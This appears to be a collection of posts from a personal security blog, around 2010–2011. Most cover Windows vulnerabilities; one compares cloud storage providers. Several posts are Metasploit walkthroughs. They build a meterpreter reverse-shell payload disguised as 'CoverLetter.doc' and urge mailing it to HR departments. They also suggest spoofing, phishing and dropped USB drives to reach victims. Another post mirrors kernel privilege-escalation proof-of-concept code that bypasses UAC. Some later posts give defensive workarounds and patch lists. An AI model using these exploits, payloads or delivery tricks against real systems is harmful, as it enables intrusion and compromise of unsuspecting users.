Battle of the cloud storage providers

With the recent show and tell of Google’s GDrive cloud storage solution its now painfully obvious that other cloud storage providers in that arena is scrambling for fear of lost of business.  As we all know Google has a track record of coming out with solutions to rivals the competitors and usually end up being the victor. This market is getting very popular over the last few years and statically it has been proven that users that started off as a free users will eventually become paying customers so the key is to get as much free users as possible.

For the last year or so the words “free cloud storage” was almost synonymous with “Dropbox”, even on the mobile platform their application was widely accepted now with Google finally in the arena its going to be interesting to see how others will start to change their business model. I have recently received some form of communication form the following providers of (Skydrive, Box, Dropbox, Ubuntu One) and wanted to give a brief summary of them and see how the might stack-up  to GDrive.

Lets start with GDrive, they are offering a 5 GB free for new users,  has a mobile application (Android devices), GDocsDrive desktop client, allows all of the average features (upload, share, collaborate),  and as of now it appears they have a 10GB file size upload limitation. The other interesting thing about this is the fact that to upgrade to 25 GB a month it will only cost you $2.50, or 100GB for just $4.99/mo. The one reason that I believe the might capture a large piece of market share is simply based on their name and the fact that they have a solid infrastructure and should be able to handle larger traffic than the average provider in this sphere.

Next is Dropboxwhich is a free service that lets you bring all your photos, docs, and videos anywhere. This means that any file you save to your Dropbox will automatically save to all your computers, phones and even the Dropbox website. The start off with 2GB free and additional 500 MB per referral, now the paid model starts with 50 GB for $10/mo, and has a file size upload limit of 2GB however if you upload files via the website you have a 300 MB cap.

Skydrive, who has been trying to gain popularity for a while and at one point offered you 25GB free storage recently restructured and is only offering 7GB free for all new users, you had the option to keep your  25GB if you were a old users but you had to log in and claim it before April 22 which has already passed. If you require more space and you love Skydrive you can get 20GB/$10yr or 100GB for $50/yr. As of now Skydrive offer the most free space and the most value for your money per space annually.

Box is another competitor who tried recently to gain new users by offering mobile users 50GB free for life if the signed up from their mobile device. If you don’t use this option you can always get 25GB for $10/mo or 50GB for $20/mo. They have a few downfalls, the have  a 200MB file upload cap, and of course the only offer a desktop client solution business/enterprise users only.

Last on my list is Ubuntu One who currently offer your standard 5GB for free users and you can get an additional 20GB for $3/mo or $30/yr. The good thing about this is you are getting a good value for your money however I don’t think the do a good job marking this product and as such I believe the might fade into the background amidst all the other big names out there.

For a great overview of some of the services mentioned above you can take a glance at this  comparison image I found over at PCWorld

What services are you using?


New Year, New MS Zero Day

With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at has created a working exploit module for this that I was testing and it seem to be working as stated.

According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution.  In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.


There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Test Lab Setup:

  • I used Vmware Workstation with two hosts (XP, and BT4)
  • I tested this against a Windows XP SP3 host
  • I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
  • Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

  • Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.
  • Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
  • Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST


msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file.  We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to  connect back home :).

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST


msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it  you should see something like this:

[*] Started reverse handler on

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to

[*] Meterpreter session 1 opened ( -> at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.

Refernce links:

Bypassing UAC with User Privilege under Windows Vista/7 **Mirrored**

Now the reason for this post is just to mirror what I think should be public knowledge and not be kept hidden since it was initially release yesterday. Today when I revisited the original site to download the POC and do some testing in my lab I  noticed it was removed. After looking around online a bit I found a few sites there were mirroring the information and I decided to do the same.

Bypassing UAC with User Privilege under Windows Vista/7

A Design Flaw in Windows Kernel API Leads to Security Breakdown

Download POC code & copy of original posting–>


I would like to present an exploit of an ambiguous parameter in Windows kernel API that leads to buffer overflows under nearly every version of Microsoft Windows, especially one that can be used as a backdoor to Windows user privilege system as well as User Access Control.

The starring API would be RtlQueryRegistryValues, it meant to be used to query multiple registry values by a query table, given the EntryContext field as output buffer. There is a problem that this field can be either treated as a UNICODE_STRING structure or a ULONG buffer length followed by the actual buffer, and this is determined by the type of the registry key being queried.

Using the code

In this example, I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCUEUDC[Language]SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.

Pastebin code –>

Stack trace shows the calling process is as follows:

GDI32.EnableEUDC ->
NtGdiEnableEudc ->
GreEnableEUDC ->
sub_BF81B3B4 ->
sub_BF81BA0B ->
RtlQueryRegistryValues (Overflow occurs)

Given this we can design the registry value which will precisely overwrite the return address of the calling function on stack, results in an arbitrary buffer being executed in kernel mode. In my PoC the buffer contains a simple kernel PE loader, which will eventually load a driver that will escalate “cmd.exe” process privilege regardless of UAC.

Pastebin code –>

The shellcode need some kernel APIs, we need to get their addresses from the running kernel.

/* code snip

// Get the running kernel file name
HMODULE hDll = GetModuleHandle(L”ntdll.dll”);
pfnZwQuerySystemInformation fnZwQuerySystemInformation = (pfnZwQuerySystemInformation)GetProcAddress(hDll,”ZwQuerySystemInformation”);
ULONG AllocSize = 0;
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);

pModInfo = (PSYSTEM_MODULE_INFORMATIONS)malloc(AllocSize);
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);
HMODULE hKernel = LoadLibraryExA(pModInfo->modinfo[0].ImageName + pModInfo->modinfo[0].ModuleNameOffset, NULL, DONT_RESOLVE_DLL_REFERENCES);

//Relocation to the running kernel base
DWORD Delta =  (DWORD)pModInfo->modinfo[0].Base – (DWORD)hKernel;


// For Vista, there is a Pool address on the stack which is going to be passed to ExFreePool before the function returns,
// so we need a valid pool address to avoid BSOD.

if(vi.dwBuildNumber < 7600)
FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x2C);

HANDLE hDummy = CreateSemaphore(NULL, 10, 10, L”Local\PoC”);
fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(pHandleInfo, AllocSize);
fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

for(DWORD i = 0; i < pHandleInfo->NumberOfHandles; i++)
if((HANDLE)pHandleInfo->Handles[i].HandleValue == hDummy)
*(DWORD*)(RegBuf + 0x4) = (DWORD)(pHandleInfo->Handles[i].Object) – 0x18;
FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x30);

// Now fills the API addresses needed
FixDWORD(pMem, sizeof(Data), 0x11111111, (DWORD)GetProcAddress(hKernel, “ExAllocatePoolWithTag”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x22222222, (DWORD)GetProcAddress(hKernel, “RtlInitAnsiString”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x33333333, (DWORD)GetProcAddress(hKernel, “RtlAnsiStringToUnicodeString”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x44444444, (DWORD)GetProcAddress(hKernel, “MmGetSystemRoutineAddress”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x55555555, (DWORD)GetProcAddress(hKernel, “RtlFreeUnicodeString”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x66666666, (DWORD)GetProcAddress(hKernel, “memcpy”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x77777777, (DWORD)GetProcAddress(hKernel, “memset”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x88888888, (DWORD)GetProcAddress(hKernel, “KeDelayExecutionThread”) + Delta);

// Here we tell the shellcode(PE loader) where the driver buffer is.
FixDWORD(pMem, sizeof(Data), 0x11223344, sizeof(DrvBuf));
FixDWORD(pMem, sizeof(Data), 0x55667788, (DWORD)pDrvMem);

/end snip

Pastebin code –>

Finally, we set the registry value and call GDI32.EnableEUDC to fire the exploit.

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\%d"), codepage);        // Get current code page
HKEY hKey;
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

After running this PoC, just type “whoami” in command prompt to see the escalated user credentials.

Points of Interest

All actions this PoC performs require only user privilege, but result in arbitrary kernel mode code execution due to the ambiguous design of RtlQueryRegistryValues. This design flaw exists in most versions of Windows kernels, yet no patch or documentation is publicly available on this issue.

Additional Information

This PoC may not correctly fix the exploited kernel context and resume execution without BSOD, such as on kernels ealier than 6.1.6000 are not supported, current supported kernels are:
Windows Vista/2008 6.1.6000 x32,
Windows Vista/2008 6.1.6001 x32,
Windows 7 6.2.7600 x32,
Windows 7/2008 R2 6.2.7600 x64.
Beyond this scope you may contact me for information on how to tune the code to work correctly on your kernel or how the shellcode works, etc. Those contents are beyond the scope of this article and of no importance to the exploit, therefore it is not included.




Initial release: 2010.11.24


This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

About the Author


Month of Abysssec Undisclosed Bugs

the below Post came through Full Disclosure mailing this today and I figured for something this interesting it merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database (, averaging one 0day and one binary analysis a day.

Get your hard-hats on, your VM¹s and debugging tools organized ­ it’s going to be a an intensive ride.

Posted today – MOAUB Day 1:


2 —

Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update to the latest versions of your various applications. Lastly if you have not been looking at your various logs, and consoles this week might be a good time to start.

Exploiting MS “LNK” Vulnerability

A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.

Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing:
This test was preformed using my BT4 VM which was assigned IP address and a Win XPSP3 VM using IP address

Step 1: Load Metasploit and get latest update

On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then load msfconsole once that is loaded run svn update so you can get the latest and greatest.

Fig-1 SVN Update

Step 2: Select your Exploit and Payload

msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

The show options commands will show you the various parameters  that needs to be set in order for the exploit to be functional. In our case its setting up the listening IP and listening port.

Fig-2  Choosing Exploit and Payload

Step 3: Fill-in required options and run exploit

At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back too, since I selected reverse_tcp.

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

Now at this stage  you have to get a bit creative, I can suggest a few things you can try:

  • Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
  • Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
  • ARP spoof your host network and find a given target that’s using Facebook or one of  many social networks and try to send them the link that way.
  • Try a far out social engineering  attack like purchase several USB drives inject them and mail them to your target with the label “free USB drive”.

Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;

Fig-4 Successful Exploit

Verify you have an active session, session using sessions -l, next connect to that session with sessions -i #, from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XPVM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is really not much the average user can do that is not aware of your everyday vulnerability, but us as IT professional need to be in the loop so that we can take back the information and make them aware. Lastly the image in figure 6 should be a dead giveaway that something is up with your computer if you didn’t connect to a share but all of sudden you see one pop-up its time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback are welcome.

Microsoft Validates Shortcut Vulnerability

Last Thursday I read a posting over at referencing  a potential vulnerability that relates to the way how Windows parses shortcuts. Since Microsoft didn’t confirm this at the time it was just another  interesting read. Now one day later Microsoft did validate this claim and now its yet another Windows zero-day without a proper workaround.


The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.


Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

Disable the displaying of icons for shortcuts

Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe.

1. Click Start, click Run, type Regedit in the Open box, and then click OK
2. Locate and then click the following registry key:


3. Click the File menu and select Export
4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

Note This will create a backup of this registry key in the My Documents folder by default

5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
6. Restart explorer.exe or restart the computer.

Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

Disable the WebClient service

Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

To disable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Disabled. If the service is running, click Stop.
4. Click OK and exit the management application.

Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

How to undo the workaround.

To re-enable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Automatic. If the service is not running, click Start.
4. Click OK, and exit the management application.

This brings up the same concern I spoke about in this post , now that Microsoft is no longer supporting SP2 we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission critical application  I think everyone should apply it.


Click OK and exit the management application.

Patch Tuesday & XP SP2 end of life

In the words of Microsoft patch Tuesday is defined as ” When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often.”

Now just in case you are wondering why I am choosing today to talk about patch Tuesdays of all days, well for starters today is significant because  patches,  and support for XP SP2 officially ends today. This might not seem like a big deal for a lot of people but I know the are several  companies that still run legacy software that are not supported by SP3 or above. So in short any new vulnerabilities that are discovered in the coming months or years will have all those users at there disposal just waiting to be exploited!

If you think that’s bad what about if a vulnerability was already  reported to Microsoft years ago and it was never patched, then those users could have already been exploited. A reference for this was a statement made by HD Moore on twitter today, “Almost four years later, Microsoft EOL’s Windows XP SP2 without fixing the flaw I reported in 2006. “ HDM is the Chief Architect of Metasploit project, the project was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but what if this exploit and many more like this was in the wrong hands, sky’s the limit.

So for anyone that is still using XP SP2 time to apply the following patches below, and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

  • MS10-042 (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
  • MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
  • MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
  • MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.